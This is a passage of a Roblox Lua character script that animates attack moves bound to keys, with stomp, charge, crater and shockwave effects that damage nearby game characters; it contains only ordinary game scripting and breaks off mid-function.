  3103. part.BrickColor=BrickColor.new('Really black')
  3104. mesh=Instance.new('SpecialMesh',part)
  3105. mesh.MeshId='http://www.roblox.com/asset/?id=3270017'
  3106. mesh.Scale=Vector3.new(3,3,3)
  3107. part2=Instance.new('Part',mod4)
  3108. part2.Anchored=true
  3109. part2.CanCollide=false
  3110. part2.FormFactor='Custom'
  3111. part2.Size=Vector3.new(.2,.2,.2)
  3112. part2.CFrame=root.CFrame*CFrame.new(0,-5,-2.6)
  3113. part2.Transparency=.7
  3114. part2.BrickColor=BrickColor.new('Royal purple')
  3115. mesh2=Instance.new('SpecialMesh',part2)
  3116. mesh2.MeshId='http://www.roblox.com/asset/?id=20329976'
  3117. mesh2.Scale=Vector3.new(3,1.5,3)
  3118. x = Instance.new("Sound",char)
  3119. x.SoundId = "http://www.roblox.com/asset/?id=157878578"
  3120. x.Pitch = ptez[math.random(1,#ptez)]
  3121. x.Volume = 1
  3122. wait(.1)
  3123. x:Play()
  3124. for i,v in pairs(FindNearestTorso(torso.CFrame.p,12))do
  3125. if v:FindFirstChild('Humanoid') then
  3126. v.Humanoid:TakeDamage(math.random(99999999,99999999))
  3127. end
  3128. end
  3129. coroutine.resume(coroutine.create(function()
  3130. for i=0,0.62,0.13 do
  3131. wait()
  3132. part.CFrame=part.CFrame
  3133. part.Transparency=i
  3134. mesh.Scale=mesh.Scale+Vector3.new(0.4,0.4,0.4)
  3135. part2.CFrame=part2.CFrame
  3136. part2.Transparency=i
  3137. mesh2.Scale=mesh2.Scale+Vector3.new(0.4,0.2,0.4)
  3138. end
  3139. part.Parent=nil
  3140. part2.Parent=nil
  3141. x:Destroy()
  3142. end))
  3143. end
  3144. ----------------------------------------------------
  3145. mod=Instance.new('Model',char)
  3146.  
  3147. function charge()
  3148. hed.Velocity=hed.CFrame.lookVector*200
  3149. part=Instance.new('Part',mod)
  3150. part.Anchored=true
  3151. part.CanCollide=false
  3152. part.FormFactor='Custom'
  3153. part.Size=Vector3.new(.2,.2,.2)
  3154. part.CFrame=hed.CFrame*CFrame.Angles(math.rad(90),0,0)
  3155. part.Transparency=.7
  3156. part.BrickColor=BrickColor.new('Black')
  3157. mesh=Instance.new('SpecialMesh',part)
  3158. mesh.MeshId='http://www.roblox.com/asset/?id=20329976'
  3159. mesh.Scale=Vector3.new(10,5,10)
  3160. part2=part:clone()
  3161. part2.Parent=mod
  3162. part2.BrickColor=BrickColor.new('Royal purple')
  3163. mesh2=mesh:clone()
  3164. mesh2.Parent=part2
  3165. mesh2.Scale=Vector3.new(20,10,20)
  3166. part3=part2:clone()
  3167. part3.Parent = mod
  3168. part3.BrickColor=BrickColor.new('Really black')
  3169. mesh3=mesh2:clone()
  3170. mesh2.Parent=part3
  3171. mesh3.Scale=Vector3.new(30,15,30)
  3172. coroutine.resume(coroutine.create(function()
  3173. for i=0,1,0.1 do
  3174. wait()
  3175. part.CFrame=part.CFrame
  3176. part.Transparency=i
  3177. mesh.Scale=mesh.Scale+Vector3.new(1,1,1)
  3178. part2.CFrame=part2.CFrame
  3179. part2.Transparency=i
  3180. mesh2.Scale=mesh2.Scale+Vector3.new(1,1,1)
  3181. part3.CFrame=part3.CFrame
  3182. part3.Transparency=i
  3183. mesh3.Scale=mesh3.Scale+Vector3.new(1,1,1)
  3184. end
  3185. part.Parent=nil
  3186. part2.Parent=nil
  3187. part3.Parent = nil
  3188. end))
  3189. end
  3190. ----------------------------------------------------
  3191. function FindNearestTorso(Position,Distance,SinglePlayer)
  3192. if SinglePlayer then return(SinglePlayer.Torso.CFrame.p -Position).magnitude < Distance end
  3193. local List = {}
  3194. for i,v in pairs(workspace:GetChildren())do
  3195. if v:IsA("Model")then
  3196. if v:findFirstChild("Torso")then
  3197. if v ~= char then
  3198. if(v.Torso.Position -Position).magnitude <= Distance then
  3199. table.insert(List,v)
  3200. end
  3201. end
  3202. end
  3203. end
  3204. end
  3205. return List
  3206. end
  3207.  
  3208. mod3 = Instance.new("Model",rleg)
  3209.  
  3210. function Stomp()
  3211. part=Instance.new('Part',mod3)
  3212. part.Anchored=true
  3213. part.CanCollide=false
  3214. part.FormFactor='Custom'
  3215. part.Size=Vector3.new(.2,.2,.2)
  3216. part.CFrame=rleg.CFrame*CFrame.new(0,-2.4,0)*CFrame.Angles(math.rad(90),0,0)
  3217. part.Transparency=.7
  3218. part.BrickColor=BrickColor.new('Bright green')
  3219. mesh=Instance.new('SpecialMesh',part)
  3220. mesh.MeshId='http://www.roblox.com/asset/?id=3270017'
  3221. mesh.Scale=Vector3.new(25,25,25)
  3222. part2=part:clone()
  3223. part2.Parent=mod3
  3224. part2.BrickColor=BrickColor.new('Bright green')
  3225. mesh2=mesh:clone()
  3226. mesh2.Parent=part2
  3227. mesh2.Scale=Vector3.new(15,15,15)
  3228. part3=part:clone()
  3229. part3.Parent=mod3
  3230. part3.TopSurface=0
  3231. part3.BottomSurface=0
  3232. part3.CFrame=rleg.CFrame*CFrame.new(0,-3,0)
  3233. mesh3=Instance.new('SpecialMesh',part3)
  3234. mesh3.MeshType = 3
  3235. mesh3.Scale=Vector3.new(12,12,12)
  3236. for i,v in pairs(FindNearestTorso(torso.CFrame.p,50))do
  3237. if v:FindFirstChild('Humanoid') then
  3238. v.Humanoid:TakeDamage(math.random(99999999,99999999))
  3239. v.Humanoid.PlatformStand = true
  3240. v:FindFirstChild("Torso").Velocity = hed.CFrame.lookVector * 100
  3241. end
  3242. end
  3243. coroutine.resume(coroutine.create(function()
  3244. for i=0,3.8,0.05 do
  3245. wait()
  3246. part.CFrame=part.CFrame
  3247. part.Transparency=i
  3248. mesh.Scale=mesh.Scale+Vector3.new(2.8,2.8,2.8)
  3249. part2.CFrame=part2.CFrame
  3250. part2.Transparency=i
  3251. mesh2.Scale=mesh2.Scale+Vector3.new(1,1,1)
  3252. part3.CFrame=part3.CFrame
  3253. part3.Transparency=i
  3254. mesh3.Scale=mesh3.Scale+Vector3.new(1.5,1.5,1.5)
  3255. end
  3256. end))
  3257. end
  3258. ----------------------------------------------------
  3259.  
  3260. local acos = math.acos
  3261. local sqrt = math.sqrt
  3262. local Vec3 = Vector3.new
  3263. local fromAxisAngle = CFrame.fromAxisAngle
  3264.  
  3265. local function toAxisAngle(CFr)
  3266. local X,Y,Z,R00,R01,R02,R10,R11,R12,R20,R21,R22 = CFr:components()
  3267. local Angle = math.acos((R00+R11+R22-1)/2)
  3268. local A = (R21-R12)^2+(R02-R20)^2+(R10-R01)^2
  3269. A = A == 0 and 0.00001 or A
  3270. local B = (R21-R12)^2+(R02-R20)^2+(R10-R01)^2
  3271. B = B == 0 and 0.00001 or B
  3272. local C = (R21-R12)^2+(R02-R20)^2+(R10-R01)^2
  3273. C = C == 0 and 0.00001 or C
  3274. local x = (R21-R12)/sqrt(A)
  3275. local y = (R02-R20)/sqrt(B)
  3276. local z = (R10-R01)/sqrt(C)
  3277. return Vec3(x,y,z),Angle
  3278. end
  3279.  
  3280. function ApplyTrig(Num,Func)
  3281. local Min,Max = Func(0),Func(1)
  3282. local i = Func(Num)
  3283. return (i-Min)/(Max-Min)
  3284. --[[if Func == "sin" then
  3285. return (math.sin((1-Num)*math.pi)+1)/2
  3286. elseif Func == "cos" then
  3287. return (math.cos((1-Num)*math.pi)+1)/2
  3288. end]]
  3289. end
  3290.  
  3291. function LerpCFrame(CFrame1,CFrame2,Num)
  3292. local Vec,Ang = toAxisAngle(CFrame1:inverse()*CFrame2)
  3293. return CFrame1*fromAxisAngle(Vec,Ang*Num) + (CFrame2.p-CFrame1.p)*Num
  3294. end
  3295.  
  3296. function Crater(Torso,Radius)
  3297. Spawn(function()
  3298. local Ray = Ray.new(Torso.Position,Vector3.new(0,-1,0)*10)
  3299. local Ignore = {}
  3300. for i,v in pairs(game:GetService("Players"):GetPlayers()) do
  3301. if v.Character ~= nil then
  3302. Ignore[#Ignore+1] = v.Character
  3303. end
  3304. end
  3305. local Hit,Pos,SurfaceNorm = Workspace:FindPartOnRayWithIgnoreList(Ray,Ignore)
  3306. if Hit == nil then return end
  3307. local Parts = {}
  3308. for i = 1,360,10 do
  3309. local P = Instance.new("Part",Torso.Parent)
  3310. P.Anchored = true
  3311. P.FormFactor = "Custom"
  3312. P.BrickColor = Hit.BrickColor
  3313. P.Material = Hit.Material
  3314. P.TopSurface = "Smooth"
  3315. P.BottomSurface = "Smooth"
  3316. P.Size = Vector3.new(5,10,10)*(math.random(80,100)/100)
  3317. P.CFrame = ((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,7,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))
  3318. Parts[#Parts+1] = {P,P.CFrame,((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,1,0))*CFrame.Angles(0,math.rad(i),0)*CFrame.new(0,0,-Radius)*CFrame.Angles(math.rad(math.random(-50,-20)),math.rad(math.random(-15,15)),math.rad(math.random(-15,15))),P.Size}
  3319. if math.random(0,5) == 0 then -- rubble
  3320. local P = Instance.new("Part",Torso.Parent)
  3321. P.Anchored = true
  3322. P.FormFactor = "Custom"
  3323. P.BrickColor = Hit.BrickColor
  3324. P.Material = Hit.Material
  3325. P.TopSurface = "Smooth"
  3326. P.BottomSurface = "Smooth"
  3327. P.Size = Vector3.new(2,2,2)*(math.random(80,100)/100)
  3328. P.CFrame = ((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,2.5,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))
  3329. Parts[#Parts+1] = {P,P.CFrame,(CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))*CFrame.Angles(0,math.rad(i),0)*CFrame.new(0,0,-Radius-8)*CFrame.Angles(math.rad(math.random(-90,90)),math.rad(math.random(-90,90)),math.rad(math.random(-90,90))),P.Size}
  3330. end
  3331. end
  3332. for i = 0,1,0.05 do
  3333. for i2,v in pairs(Parts) do
  3334. v[1].CFrame = LerpCFrame(v[2],v[3],ApplyTrig(i,math.cos))
  3335. end
  3336. wait(0.02)
  3337. end
  3338. for i,v in pairs(Parts) do
  3339. if v[1].Size.X > 2.1 then
  3340. v[1].CFrame = v[1].CFrame+Vector3.new(0,2,0)
  3341. end
  3342. v[1].Anchored = false
  3343. end
  3344. for i = 0,1,0.05 do
  3345. for i2,v in pairs(Parts) do
  3346. v[1].Transparency = i
  3347. if i == 1 then
  3348. v[1]:Destroy()
  3349. elseif i >= 0.25 then
  3350. v[1].CanCollide = false
  3351. end
  3352. end
  3353. wait(0.02)
  3354. end
  3355. Parts = nil
  3356. end)
  3357. end
  3358.  
  3359. ----------------------------------------------------
  3360. mouse.KeyDown:connect(function(key)
  3361. if key == "r" then
  3362. larm.BrickColor = BrickColor.new("Royal purple")
  3363. rarm.BrickColor = BrickColor.new("Royal purple")
  3364. if Debounces.CanAttack == true then
  3365. Debounces.CanAttack = false
  3366. Debounces.on = true
  3367. Debounces.NoIdl = true
  3368. to = char.Absolution.Thingy2.Touched:connect(function(ht)
  3369. hit = ht.Parent
  3370. if ht and hit:IsA("Model") then
  3371. if hit:FindFirstChild("Humanoid") then
  3372. if hit.Name ~= p.Name then
  3373. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  3374. Debounces.Slashed = true]]--
  3375. hit:FindFirstChild("Humanoid"):TakeDamage(10)
  3376. wait(1)
  3377. --Debounces.Slashed = false
  3378. --end
  3379. end
  3380. end
  3381. elseif ht and hit:IsA("Hat") then
  3382. if hit.Parent.Name ~= p.Name then
  3383. if hit.Parent:FindFirstChild("Humanoid") then
  3384. --[[ if Debounces.Slashing == true and Debounces.Slashed == false then
  3385. Debounces.Slashed = true]]--
  3386. hit.Parent:FindFirstChild("Humanoid"):TakeDamage(10)
  3387. wait(1)
  3388. --Debounces.Slashed = false
  3389. end
  3390. end
  3391. end
  3392. end)
  3393. q = Instance.new("Sound",hed)
  3394. q.SoundId = "http://www.roblox.com/asset/?id=134012322"
  3395. q.Pitch = 0.85
  3396. q.Looped = false
  3397. q1 = Instance.new("Sound",hed)
  3398. q1.SoundId = "http://www.roblox.com/asset/?id=134012322"
  3399. q1.Pitch = 0.85
  3400. q1.Looped = false
  3401. q:Play()
  3402. q1:Play()
  3403. for i = 1,20 do
  3404. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.3,1.1,-1) * CFrame.Angles(math.rad(115), math.rad(0), math.rad(-55)), 0.2)
  3405. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.3,1.1,-1) * CFrame.Angles(math.rad(115), math.rad(0), math.rad(55)), 0.2)
  3406. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0) * CFrame.Angles(math.rad(20), math.rad(0), math.rad(0)),0.2)
  3407. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 4, 0) * CFrame.Angles(math.rad(30), math.rad(0), 0), 0.2)
  3408. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, 1) * CFrame.Angles(math.rad(-60), 0, math.rad(0)), 0.2)
  3409. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3, .6) * CFrame.Angles(math.rad(-60), 0, math.rad(0)), 0.2)
  3410. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -2.2, -3) * CFrame.Angles(math.rad(-90), math.rad(-142), math.rad(0)), 0.25)
  3411. if Debounces.on == false then break end
  3412. rs:wait(.6)
  3413. end
  3414. n = Instance.new("Sound",hed)
  3415. n.SoundId = "http://www.roblox.com/asset/?id=165969964"
  3416. n.Pitch = 0.94
  3417. n.Looped = false
  3418. n1 = Instance.new("Sound",hed)
  3419. n1.SoundId = "http://www.roblox.com/asset/?id=168514932"
  3420. n1.Pitch = 0.94
  3421. n1.Looped = false
  3422. n:Play()
  3423. n1:Play()
  3424. b = Instance.new("Sound",hed)
  3425. b.SoundId = "http://www.roblox.com/asset/?id=168586586"
  3426. b.Pitch = 0.94
  3427. b.Looped = false
  3428. b1 = Instance.new("Sound",hed)
  3429. b1.SoundId = "http://www.roblox.com/asset/?id=168586586"
  3430. b1.Pitch = 0.94
  3431. b1.Looped = false
  3432. b:Play()
  3433. b1:Play()
  3434. for i = 1,26 do
  3435. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.3,1.1,-1) * CFrame.Angles(math.rad(50), math.rad(0), math.rad(-55)), 0.25)
  3436. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.3,1.1,-1) * CFrame.Angles(math.rad(50), math.rad(0), math.rad(55)), 0.25)
  3437. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(0)),0.25)
  3438. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.1, 0) * CFrame.Angles(math.rad(-40), math.rad(0), 0), 0.25)
  3439. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, -1) * CFrame.Angles(math.rad(50), 0, math.rad(0)), 0.25)
  3440. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3, .4) * CFrame.Angles(math.rad(-10), 0, math.rad(0)), 0.25)
  3441. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(1.4, -3.5, -7) * CFrame.Angles(math.rad(-90), math.rad(-142), math.rad(20)), 0.25)
  3442. if Debounces.on == false then break end
  3443. rs:wait(1)
  3444. end
  3445. wait(.5)
  3446. to:disconnect()
  3447. q:Destroy()
  3448. q1:Destroy()
  3449. n:Destroy()
  3450. n1:Destroy()
  3451. larm.BrickColor = BrickColor.new("Really black")
  3452. rarm.BrickColor = BrickColor.new("Really black")
  3453. if Debounces.CanAttack == false then
  3454. Debounces.CanAttack = true
  3455. Debounces.on = false
  3456. Debounces.NoIdl = false
  3457. end
  3458. end
  3459. end
  3460. end)
  3461. ----------------------------------------------------
  3462. mouse.KeyDown:connect(function(key)
  3463. if key == "q" then
  3464. larm.BrickColor = BrickColor.new("Royal purple")
  3465. rarm.BrickColor = BrickColor.new("Royal purple")
  3466. if Debounces.CanAttack == true then
  3467. Debounces.CanAttack = false
  3468. Debounces.on = true
  3469. Debounces.NoIdl = true
  3470. to = char.Absolution.Thingy2.Touched:connect(function(ht)
  3471. hit = ht.Parent
  3472. if ht and hit:IsA("Model") then
  3473. if hit:FindFirstChild("Humanoid") then
  3474. if hit.Name ~= p.Name then
  3475. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  3476. Debounces.Slashed = true]]--
  3477. hit:FindFirstChild("Humanoid"):TakeDamage(4)
  3478. wait(1)
  3479. --Debounces.Slashed = false
  3480. --end
  3481. end
  3482. end
  3483. elseif ht and hit:IsA("Hat") then
  3484. if hit.Parent.Name ~= p.Name then
  3485. if hit.Parent:FindFirstChild("Humanoid") then
  3486. --[[ if Debounces.Slashing == true and Debounces.Slashed == false then
  3487. Debounces.Slashed = true]]--
  3488. hit.Parent:FindFirstChild("Humanoid"):TakeDamage(4)
  3489. wait(1)
  3490. --Debounces.Slashed = false
  3491. end
  3492. end
  3493. end
  3494. end)
  3495. for i = 1, 20 do
  3496. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0) * CFrame.Angles(math.rad(21), math.rad(75), math.rad(50)), 0.2)
  3497. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,0) * CFrame.Angles(math.rad(-30), math.rad(0), math.rad(-18)), 0.2)
  3498. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2) * CFrame.Angles(math.rad(-14),math.rad(-60),0), 0.5)
  3499. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(70), 0), 0.5)
  3500. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.5)
  3501. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.5)
  3502. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.7, -1.4) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  3503. if Debounces.on == false then break end
  3504. rs:wait(2)
  3505. end
  3506. z = Instance.new("Sound",hed)
  3507. z.SoundId = "rbxassetid://160069154"
  3508. z.Looped = false
  3509. z.Pitch = .9
  3510. z1 = Instance.new("Sound",hed)
  3511. z1.SoundId = "rbxassetid://160069154"
  3512. z1.Looped = false
  3513. z1.Pitch = .9
  3514. wait(0.01)
  3515. z:Play()
  3516. z1:Play()
  3517. for i = 1, 20 do
  3518. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(50)), 0.2)
  3519. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2,.9,-1) * CFrame.Angles(math.rad(60), math.rad(0), math.rad(20)), 0.5)
  3520. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2) * CFrame.Angles(math.rad(-14),math.rad(30),0), 0.5)
  3521. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -3, 0) * CFrame.Angles(math.rad(0), math.rad(-30), math.rad(0)), 0.5)
  3522. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -1, -2) * CFrame.Angles(math.rad(-10), 0, 0), 0.5)
  3523. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2.8, .6) * CFrame.Angles(math.rad(-65), 0, 0), 0.5)
  3524. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.7, -1.4) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  3525. if Debounces.on == false then break end
  3526. rs:wait(2)
  3527. end
  3528. for i = 1, 20 do
  3529. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0) * CFrame.Angles(math.rad(140), math.rad(0), math.rad(50)), 0.4)
  3530. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-18)), 0.4)
  3531. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2) * CFrame.Angles(math.rad(-14),math.rad(10),0), 0.5)
  3532. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(-10), 0), 0.5)
  3533. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.5)
  3534. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.5)
  3535. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.7, -1.4) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  3536. if Debounces.on == false then break end
  3537. rs:wait(2)
  3538. end
  3539. z = Instance.new("Sound",hed)
  3540. z.SoundId = "rbxassetid://168586621"
  3541. z.Looped = false
  3542. z.Pitch = 1
  3543. z1 = Instance.new("Sound",hed)
  3544. z1.SoundId = "rbxassetid://168586621"
  3545. z1.Looped = false
  3546. z1.Pitch = 1
  3547. wait(0.01)
  3548. z:Play()
  3549. z1:Play()
  3550. for i = 1, 20 do
  3551. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0) * CFrame.Angles(math.rad(40), math.rad(-20), math.rad(10)), 0.5)
  3552. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,0) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(-18)), 0.4)
  3553. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2) * CFrame.Angles(math.rad(-14),math.rad(-40),0), 0.5)
  3554. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(40), 0), 0.5)
  3555. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -3, 0) * CFrame.Angles(math.rad(-20), 0, math.rad(-10)), 0.5)
  3556. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(math.rad(20), 0, math.rad(10)), 0.5)
  3557. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -2.8, -1.4) * CFrame.Angles(math.rad(-110), math.rad(-90), math.rad(20)), 1)
  3558. if Debounces.on == false then break end
  3559. rs:wait(2)
  3560. end
  3561. to:disconnect()
  3562. larm.BrickColor = BrickColor.new("Really black")
  3563. rarm.BrickColor = BrickColor.new("Really black")
  3564. if Debounces.CanAttack == false then
  3565. Debounces.CanAttack = true
  3566. Debounces.on = false
  3567. Debounces.NoIdl = false
  3568. end
  3569. end
  3570. end
  3571. end)
  3572. ----------------------------------------------------
  3573. Sit = false
  3574. mouse.KeyDown:connect(function(key)
  3575. if key == "v" then
  3576. if Sit == false then
  3577. Sit = true
  3578. hum.WalkSpeed = 0.001
  3579. stanceToggle = "Sitting"
  3580. elseif Sit == true then
  3581. Sit = false
  3582. hum.WalkSpeed = 7
  3583. stanceToggle = "Normal"
  3584. end
  3585. end
  3586. end)
  3587. ----------------------------------------------------
  3588. mouse.KeyDown:connect(function(key)
  3589. if key == "t" then
  3590. if Debounces.CanAttack == true then
  3591. Debounces.CanAttack = false
  3592. Debounces.on = true
  3593. Debounces.NoIdl = true
  3594. for i = 1, 20 do
  3595. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(2.3,1.1,-1) * CFrame.Angles(math.rad(115), math.rad(0), math.rad(-55)), 0.2)
  3596. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.3,1.1,-1) * CFrame.Angles(math.rad(115), math.rad(0), math.rad(55)), 0.2)
  3597. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0) * CFrame.Angles(math.rad(20), math.rad(0), math.rad(0)),0.2)
  3598. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(30), math.rad(0), 0), 0.2)
  3599. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, .6) * CFrame.Angles(math.rad(-30), 0, math.rad(0)), 0.2)
  3600. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2, -1.2) * CFrame.Angles(math.rad(0), 0, math.rad(0)), 0.2)
  3601. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(1.4, -3.5, -7) * CFrame.Angles(math.rad(-90), math.rad(-142), math.rad(20)), 1)
  3602. if Debounces.on == false then break end
  3603. rs:wait(2.6)
  3604. end
  3605. Spawn(function()
  3606. local Parts = {}
  3607. for Y = -5,5 do
  3608. local P = Instance.new("Part",char)
  3609. P.Anchored = true
  3610. P.FormFactor = "Custom"
  3611. P.CanCollide = false
  3612. P.Size = Vector3.new(1,2,1)
  3613. P.TopSurface = "SmoothNoOutlines"
  3614. P.BottomSurface = "SmoothNoOutlines"
  3615. P.BrickColor = BrickColor.new("Really black")
  3616. P.Name = tostring(Y)
  3617. local i = (Y+5)/(10)
  3618. i = 1-math.cos(math.pi*i-(math.pi/2))
  3619. P.CFrame = char.HumanoidRootPart.CFrame*CFrame.new(0,Y,-15+(i*1.5))*CFrame.Angles(math.rad(Y*5),0,0)
  3620. --[[P.Touched:connect(function(ht)
  3621. local hit = ht.Parent
  3622. if hit:FindFirstChild("Humanoid") then
  3623. hit.Humanoid:TakeDamage(math.random(99999999,99999999))
  3624. end
  3625. end)]]--
  3626. s = Instance.new("Sound",P)
  3627. s.SoundId = "rbxassetid://228343271"
  3628. s.Volume = .7
  3629. s.Pitch = 0.9
  3630. s:Play()
  3631. P.Touched:connect(function(ht)
  3632. hit = ht.Parent
  3633. if ht and hit:IsA("Model") then
  3634. if hit:FindFirstChild("Humanoid") then
  3635. if hit.Name ~= p.Name then
  3636. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  3637. Debounces.Slashed = true]]--
  3638. hit:FindFirstChild("Humanoid"):TakeDamage(math.random(99999999,99999999))
  3639. hit:FindFirstChild("Humanoid").PlatformStand = true
  3640. wait(1)
  3641. --Debounces.Slashed = false
  3642. --end
  3643. end
  3644. end
  3645. elseif ht and hit:IsA("Hat") then
  3646. if hit.Parent.Name ~= p.Name then
  3647. if hit.Parent:FindFirstChild("Humanoid") then
  3648. --[[if Debounces.Slashing == true and Debounces.Slashed == false then
  3649. Debounces.Slashed = true]]--
  3650. hit.Parent:FindFirstChild("Humanoid"):TakeDamage(math.random (99999999,99999999))
  3651. hit:FindFirstChild("Humanoid").PlatformStand = true
  3652. wait(1)
  3653. --Debounces.Slashed = false
  3654. --end
  3655. end
  3656. end
  3657. end
  3658. end)
  3659. Parts[#Parts+1] = P
  3660. end
  3661. local BREAKIT = false
  3662. local CParts = {}
  3663. local Rocks = {}
  3664. local LastPos = nil
  3665. for i = 1,70 do
  3666. for i2,v in pairs(Parts) do
  3667. v.CFrame = v.CFrame*CFrame.new(0,0,-4)
  3668. local cf = v.CFrame
  3669. v.Size = v.Size+Vector3.new(0.4,0.35,0)
  3670. v.CFrame = cf
  3671. v.Transparency = v.Transparency+0.02
  3672. if v.Transparency >= 0.975 then BREAKIT = true end
  3673. if v.Name == "0" then
  3674. local Ignore = {}
  3675. for i,v in pairs(game:GetService("Players"):GetPlayers()) do
  3676. if v.Character ~= nil then
  3677. Ignore[#Ignore+1] = v.Character
  3678. end
  3679. end
  3680. local ray = Ray.new(v.Position+Vector3.new(0,20,0),Vector3.new(0,-200,0))
  3681. local Hit,Pos,SurfaceNorm = Workspace:FindPartOnRayWithIgnoreList(ray,Ignore)
  3682. if Hit ~= nil then
  3683. if #Rocks == 0 then
  3684. for i = 1,5 do
  3685. local P = Instance.new("Part",char)
  3686. Rocks[#Rocks+1] = P
  3687. P.Anchored = true
  3688. P.FormFactor = "Custom"
  3689. P.BrickColor = Hit.BrickColor
  3690. P.Material = Hit.Material
  3691. P.TopSurface = "Smooth"
  3692. P.BottomSurface = "Smooth"
  3693. P.Size = Vector3.new(1,1,1)*(math.random(500,900)/100)
  3694. end
  3695. end
  3696. for i,P in pairs(Rocks) do
  3697. P.CFrame = ((CFrame.new(Pos)*(v.CFrame-v.Position))*CFrame.new(math.random(-math.ceil(v.Size.X/2),math.ceil(v.Size.X/2)),0,-math.random(5,8))-Vector3.new(0,0.25,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(20,50)))
  3698. end
  3699. local P = Instance.new("Part",char)
  3700. CParts[#CParts+1] = {P,tick()}
  3701. P.Anchored = true
  3702. P.FormFactor = "Custom"
  3703. P.BrickColor = Hit.BrickColor
  3704. P.Material = Hit.Material
  3705. P.TopSurface = "Smooth"
  3706. P.BottomSurface = "Smooth"
  3707. P.Size = Vector3.new(1,1,1)*(math.random(100,300)/100)
  3708. Pos = CFrame.new(Pos)*(v.CFrame-v.Position)*CFrame.new(v.Size.X/2,0,0)
  3709. Pos = Pos.p
